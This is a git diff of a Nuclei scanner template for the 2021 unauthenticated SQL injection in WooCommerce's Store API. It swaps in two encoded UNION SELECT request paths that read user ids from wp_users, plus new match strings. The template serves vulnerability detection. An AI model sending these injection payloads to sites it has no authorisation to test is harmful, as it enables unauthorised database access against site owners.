payload update

vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml

@@ -9,20 +9,18 @@ info:
       - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
       - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
 
-
 requests:
-  - raw:
-      - |
-        GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522nuclei-pdteam%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1
-        {{Hostname}}
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
+      - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - 'nuclei-pdteam'
-          - '"count":'
-        part: body
+          - 'sqli-test'
+          - 'attribute_counts'
         condition: and
 
       - type: word
@@ -32,4 +30,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200